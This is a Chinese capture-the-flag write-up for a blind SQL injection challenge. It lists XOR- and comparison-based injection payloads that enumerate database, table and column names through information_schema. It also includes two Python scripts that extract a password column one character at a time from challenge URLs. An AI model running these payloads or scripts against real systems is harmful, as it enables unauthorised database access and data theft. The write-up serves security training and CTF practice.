0x00 知识点
盲注
0x01 解题
根据题目提示盲注,随便点几下找到注入点
发现我们输入^符号成功跳转页面,证明存在注入
1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema
ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称
1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)
where(table_schema)='geek'),%d,1))=%d)^1"%(i,ord(j)) 获取数据库表名
1^(ord(substr((select(group_concat(column_name))from(information_schema.column
s)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,ord(j))
获取数据库列名
获取flag:
import requests
url = "http://9c13f59b-720e-4c5a-9d63-69342c1be65a.node3.buuoj.cn/search.php"
for i in range(1,20):
for j in range(1,128):
d ="?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),'"+str(i)+"',1))='"+str(j)+"')^1"
r = requests.get(url+d)
if 'Click' in r.text:
print(chr(j))
这里再贴一个师傅的盲注脚本:
https://blog.csdn.net/qq_42967398/article/details/102979306
import requests
import io
import sys
import string
import time
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码,否则s.text不能输出
'''
url = "http://118.25.14.40:8104/search.php?id=1=(1)=1"
s = requests.get(url)
s.encoding = 'utf-8'
content = s.content
#检验是否成功
if 'NO! Not this! Click others~~~' in s.text:
s.encoding = 'gbk'
print(s.text)
#构造sql注入语句
F1naI1y,Flaaaaag
and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1,1))=xxx)and(length(database()))!='20
ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s
ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='do_y0u_l1ke_long_t4ble_name')),%s,1))=%s
ascii(mid((select(d0_you_als0_l1ke_very_long_column_name)from(do_y0u_l1ke_long_t4ble_name)),%s,1))=%s
'''
url = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)=1"
url2 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%s,1))=%s)=1"
url3 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%s,1))=%s)=1"
url4 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%s,1))=%s)=1"
url5 = "http://118.25.14.40:8104/search.php?id=1=(ascii(substr((select(group_concat(password))from(F1naI1y)),%s,1))=%s)=1"
ss = ""
x = string.printable
for i in range(1,30):
for j in x:
payload = url5%(str(i),ord(j))
#print(payload)
time.sleep(0.5)
s = requests.get(payload)
if 'NO! Not this! Click others~~~' in s.text:
ss += j
print(ss)
break
参考链接
http://www.pdsdt.lovepdsdt.com/index.php/2019/11/19/2019_geek_web/#0x20_Finalsql
https://blog.csdn.net/qq_42967398/article/details/102979306
原文地址:https://www.cnblogs.com/wangtanzhi/p/12305052.html
时间: 2024-10-21 10:31:24